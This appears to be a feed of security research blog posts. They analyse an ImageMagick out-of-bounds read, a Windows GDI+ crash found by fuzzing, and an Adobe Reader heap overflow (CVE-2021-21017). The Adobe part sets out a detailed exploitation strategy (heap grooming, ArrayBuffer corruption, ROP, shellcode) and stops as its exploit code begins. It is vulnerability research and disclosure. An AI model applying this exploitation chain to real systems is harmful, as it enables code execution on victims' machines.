Therefore, to summarize, the program crashes because:

  1. The program allocates 248 bytes of memory to process strip data for image, a pointer “p” points to this memory.
  2. Inside a for loop this pointer is increased by “14” or “0xE” for number of rows in the image, which in this case is 32.
  3. Based on this calculation, 32*14=448 bytes or more amount of memory is required but only 248 in actual memory were allocated.
  4. The program tries to read data assuming total memory is of 448+ bytes, but the fact that only 248 bytes are available causes an Out of Bound memory read issue.

How it was fixed?

If we check at the patch diff, we can see that the following changes were made to fix this issue:

Here the 2nd argument to “AcquireQuantumMemory” is multiplied by 2 thus increasing the total amount of memory and preventing this Out of Bound read issue from heap memory. The total memory allocated is 496 bytes, 248*2=496 bytes, as we can see below:

Another issue with the fix:

A new version of ImageMagick 7.0.46 was released to fix this issue. While the patch fixes the memory allocation issue, if we check the code below, we can see that there was a call to memset which didn’t set the proper memory size to zero.

Memory was allocated extent*2*sizeof(*strip_pixels) but in this memset to 0 was only done for extent*sizeof(*strip_pixels). This means half of the memory was set to 0 and rest contained 0xbebebebe, which is by default for ASAN new memory allocation.

This has since been fixed in subsequent releases of ImageMagick by using extent=2*TIFFStripSize(tiff); in the following patch:

https://github.com/ImageMagick/ImageMagick/commit/a5b64ccc422615264287028fe6bea8a131043b59#diff-0a5eef63b187504ff513056aa8fd6a7f5c1f57b6d2577a75cff428c0c7530978

Conclusion:

Processing various image files requires deep understanding of various file formats and thus it is possible that something may not be exactly implemented or missed. This can lead to various vulnerabilities in such image processing software. Some of this vulnerability can lead to DoS and some can lead to remote code execution affecting every installation of such popular software.

Fuzzing plays an important role in finding vulnerabilities often missed by developers and during testing. We at McAfee constantly fuzz various closed source as well as open source software to help secure them. We work very closely with various vendors and do responsible disclosure. This shows McAfee’s commitment towards securing the software and protecting our customers from various threats.

We will continue to fuzz various software and work with vendors to help mitigate risk arriving from such threats.

We would like to thank and appreciate ImageMagick team for quickly resolving this issue within 24 hours and releasing a new version to fix this issue.

The post Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829 appeared first on McAfee Blogs.

☑ ★ ✇ McAfee Blogs

Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+

By: Hardik Shah
Consejos para protegerte de quienes intentan hackear tus correos electrónicos

Introduction

Microsoft Windows Graphics Device Interface+, also known as GDI+, allows various applications to use different graphics functionality on video displays as well as printers. Windows applications don’t directly access graphics hardware such as device drivers, but they interact with GDI, which in turn then interacts with device drivers. In this way, there is an abstraction layer to Windows applications and a common set of APIs for everyone to use.

Because of its complex format, GDI+ has a known history of various vulnerabilities. We at McAfee continuously fuzz various open source and closed source software including windows GDI+. Over the last few years, we have reported various issues to Microsoft in various Windows components including GDI+ and have received CVEs for them.

In this post, we detail our root cause analysis of one such vulnerability which we found using WinAFL: CVE-2021-1665 – GDI+ Remote Code Execution Vulnerability.  This issue was fixed in January 2021 as part of a Microsoft Patch.

What is WinAFL?

WinAFL is a Windows port of a popular Linux AFL fuzzer and is maintained by Ivan Fratric of Google Project Zero. WinAFL uses dynamic binary instrumentation using DynamoRIO and it requires a program called as a harness. A harness is nothing but a simple program which calls the APIs we want to fuzz.

A simple harness for this was already provided with WinAFL, we can enable “Image->GetThumbnailImage” code which was commented by default in the code. Following is the harness code to fuzz GDI+ image and GetThumbnailImage API:

 

As you can see, this small piece of code simply creates a new image object from the provided input file and then calls another function to generate a thumbnail image. This makes for an excellent attack vector and can affect various Windows applications if they use thumbnail images. In addition, this requires little user interaction, thus software which uses GDI+ and calls GetThumbnailImage API, is vulnerable.

Collecting Corpus:

A good corpus provides a sound foundation for fuzzing. For that we can use Google or GitHub in addition to further test corpus available from various software and public EMF files which were released for other vulnerabilities. We have generated a few test files by making changes to a sample code provided on Microsoft’s site which generates an EMF file with EMFPlusDrawString and other records:

Ref: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emfplus/07bda2af-7a5d-4c0b-b996-30326a41fa57

Minimizing Corpus:

After we have collected an initial corpus file, we need to minimize it. For this we can use a utility called winafl-cmin.py as follows:

winafl-cmin.py -D D:\\work\\winafl\\DynamoRIO\\bin32 -t 10000 -i inCorpus -o minCorpus -covtype edge -coverage_module gdiplus.dll -target_module gdiplus_hardik.exe -target_method fuzzMe -nargs 2 — gdiplus_hardik.exe @@

How does WinAFL work?

WinAFL uses the concept of in-memory fuzzing. We need to provide a function name to WinAFL. It will save the program state at the start of the function and take one input file from the corpus, mutate it, and feed it to the function.

It will monitor this for any new code paths or crashes. If it finds a new code path, it will consider the new file as an interesting test case and will add it to the queue for further mutation. If it finds any crashes, it will save the crashing file in crashes folder.

The following picture shows the fuzzing flow:

Fuzzing with WinAFL:

Once we have compiled our harness program, collected, and minimized the corpus, we can run this command to fuzz our program with WinAFL:

afl-fuzz.exe -i minCorpus -o out -D D:\work\winafl\DynamoRIO\bin32 -t 20000 —coverage_module gdiplus.dll -fuzz_iterations 5000 -target_module gdiplus_hardik.exe -target_offset 0x16e0 -nargs 2 — gdiplus_hardik.exe @@

Results:

We found a few crashes and after triaging unique crashes, and we found a crash in “gdiplus!BuiltLine::GetBaselineOffset” which looks as follows in the call stack below:

As can be seen in the above image, the program is crashing while trying to read data from a memory address pointed by edx+8. We can see it registers ebx, ecx and edx contains c0c0c0c0 which means that page heap is enabled for the binary. We can also see that c0c0c0c0 is being passed as a parameter to “gdiplus!FullTextImager::RenderLine” function.

Patch Diffing to See If We Can Find the Root Cause

To figure out a root cause, we can use patch diffing—namely, we can use IDA BinDiff plugin to identify what changes have been made to patched file. If we are lucky, we can easily find the root cause by just looking at the code that was changed. So, we can generate an IDB file of patched and unpatched versions of gdiplus.dll and then run IDA BinDiff plugin to see the changes.

We can see that one new function was added in the patched file, and this seems to be a destructor for BuiltLine Object :

We can also see that there are a few functions where the similarity score is < 1 and one such function is FullTextImager::BuildAllLines as shown below:

Now, just to confirm if this function is really the one which was patched, we can run our test program and POC in windbg and set a break point on this function. We can see that the breakpoint is hit and the program doesn’t crash anymore:

Now, as a next step, we need to identify what has been changed in this function to fix this vulnerability. For that we can check flow graph of this function and we see something as follows. Unfortunately, there are too many changes to identify the vulnerability by simply looking at the diff:

The left side illustrates an unpatched dll while right side shows a patched dll:

  • Green indicates that the patched and unpatched blocks are same.
  • Yellow blocks indicate there has been some changes between unpatched and patched dlls.
  • Red blocks call out differences in the dlls.

If we zoom in on the yellow blocks we can see following:

We can note several changes. Few blocks are removed in the patched DLL, so patch diffing will alone will not be sufficient to identify the root cause of this issue. However, this presents valuable hints about where to look and what to look for when using other methods for debugging such as windbg. A few observations we can spot from the bindiff output above:

  • In the unpatched DLL, if we check carefully we can see that there is a call to “GetuntrimmedCharacterCount” function and later on there is another call to a function “SetSpan::SpanVector
  • In the patched DLL, we can see that there is a call to “GetuntrimmedCharacterCount” where a return value stored inside EAX register is checked. If it’s zero, then control jumps to another location—a destructor for BuiltLine Object, this was newly added code in the patched DLL:

So we can assume that this is where the vulnerability is fixed. Now we need to figure out following:

  1. Why our program is crashing with the provided POC file?
  2. What field in the file is causing this crash?
  3. What value of the field?
  4. Which condition in program which is causing this crash?
  5. How this was fixed?

EMF File Format:

EMF is also known as enhanced meta file format which is used to store graphical images device independently. An EMF file is consisting of various records which is of variable length. It can contain definition of various graphic object, commands for drawing and other graphics properties.

Credit: MS EMF documentation.

Generally, an EMF file consist of the following records:

  1. EMF Header – This contains information about EMF structure.
  2. EMF Records – This can be various variable length records, containing information about graphics properties, drawing order, and so forth.
  3. EMF EOF Record – This is the last record in EMF file.

Detailed specifications of EMF file format can be seen at Microsoft site at following URL:

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-emf/91c257d7-c39d-4a36-9b1f-63e3f73d30ca

Locating the Vulnerable Record in the EMF File:

Generally, most of the issues in EMF are because of malformed or corrupt records. We need to figure out which record type is causing this crash. For this if we look at the call stack we can see following:

We can notice a call to function “gdiplus!GdipPlayMetafileRecordCallback

By setting a breakpoint on this function and checking parameter, we can see following:

We can see that EDX contains some memory address and we can see that parameter given to this function are: 00x00401c,0x00000000 and 0x00000044.

Also, on checking the location pointed by EDX we can see following:

If we check our POC EMF file, we can see that this data belongs to file from offset: 0x15c:

By going through EMF specification and manually parsing the records, we can easily figure out that this is a “EmfPlusDrawString” record, the format of which is shown below:

In our case:

Record Type = 0x401c EmfPlusDrawString record

Flags = 0x0000

Size = 0x50

Data size = 0x44

Brushid = 0x02

Format id = 0x01

Length = 0x14

Layoutrect = 00 00 00 00 00 00 00 00 FC FF C7 42 00 00 80 FF

String data =

Now that we have located the record that seems to be causing the crash, the next thing is to figure out why our program is crashing. If we debug and check the code, we can see that control reaches to a function “gdiplus!FullTextImager::BuildAllLines”. When we decompile this code, we can see something  like this:

The following diagram shows the function call hierarchy:

The execution flow in summary:

  1. Inside “Builtline::BuildAllLines” function, there is a while loop inside which the program allocates 0x60 bytes of memory. Then it calls the “Builtline::BuiltLine”
  2. The “Builtline::BuiltLine” function moves data to the newly allocated memory and then it calls “BuiltLine::GetUntrimmedCharacterCount”.
  3. The return value of “BuiltLine::GetUntrimmedCharacterCount” is added to loop counter, which is ECX. This process will be repeated until the loop counter (ECX) is < string length(EAX), which is 0x14 here.
  4. The loop starts from 0, so it should terminate at 0x13 or it should terminate when the return value of “GetUntrimmedCharacterCount” is 0.
  5. But in the vulnerable DLL, the program doesn’t terminate because of the way loop counter is increased. Here, “BuiltLine::GetUntrimmedCharacterCount” returns 0, which is added to Loop counter(ECX) and doesn’t increase ECX value. It allocates 0x60 bytes of memory and creates another line, corrupting the data that later leads the program to crash. The loop is executed for 21 times instead of 20.

In detail:

1. Inside “Builtline::BuildAllLines” memory will be allocated for 0x60 or 96 bytes, and in the debugger it looks as follows:

2. Then it calls “BuiltLine::BuiltLine” function and moves the data to newly allocated memory:

3. This happens in side a while loop and there is a function call to “BuiltLine::GetUntrimmedCharacterCount”.

4. Return value of “BuiltLine::GetUntrimmedCharacterCount” is stored in a location 0x12ff2ec. This value will be 1 as can be seen below:

5. This value gets added to ECX:

6. Then there is a check that determines if ecx< eax. If true, it will continue loop, else it will jump to another location:

7. Now in the vulnerable version, loop doesn’t exist if the return value of “BuiltLine::GetUntrimmedCharacterCount” is 0, which means that this 0 will be added to ECX and which means ECX will not increase. So the loop will execute 1 more time with the “ECX” value of 0x13. Thus, this will lead to loop getting executed 21 times rather than 20 times. This is the root cause of the problem here.

Also after some debugging, we can figure out why EAX contains 14. It is read from the POC file at offset: 0x174:

If we recall, this is the EmfPlusDrawString record and 0x14 is the length we mentioned before.

Later on, the program reaches to “FullTextImager::Render” function corrupting the value of EAX because it reads the unused memory:

This will be passed as an argument to “FullTextImager::RenderLine” function:

Later, program will crash while trying to access this location.

Our program was crashing while processing EmfPlusDrawString record inside the EMF file while accessing an invalid memory location and processing string data field. Basically, the program was not verifying the return value of “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function and this resulted in taking a different program path that  corrupted the register and various memory values, ultimately causing the crash.

How this issue was fixed?

As we have figured out by looking at patch diff above, a check was added which determined the return value of “gdiplus!BuiltLine::GetUntrimmedCharacterCount” function.

If the retuned value is 0, then program xor’s EBX which contains counter and jump to a location which calls destructor for Builtline Object:

Here is the destructor that prevents the issue:

Conclusion:

GDI+ is a very commonly used Windows component, and a vulnerability like this can affect billions of systems across the globe. We recommend our users to apply proper updates and keep their Windows deployment current.

We at McAfee are continuously fuzzing various open source and closed source library and work with vendors to fix such issues by responsibly disclosing such issues to them giving them proper time to fix the issue and release updates as needed.

We are thankful to Microsoft for working with us on fixing this issue and releasing an update.

 

 

 

 

The post Analyzing CVE-2021-1665 – Remote Code Execution Vulnerability in Windows GDI+ appeared first on McAfee Blogs.

☑ ★ ✇ Exodus Intelligence

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

By: Exodus Intel VRT

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to versions 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc which allocates an array with the amount of elements provided as the first parameter with size specified as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed by the first parameter. Its third parameter specified the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)
  • Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

  • Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced)
  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
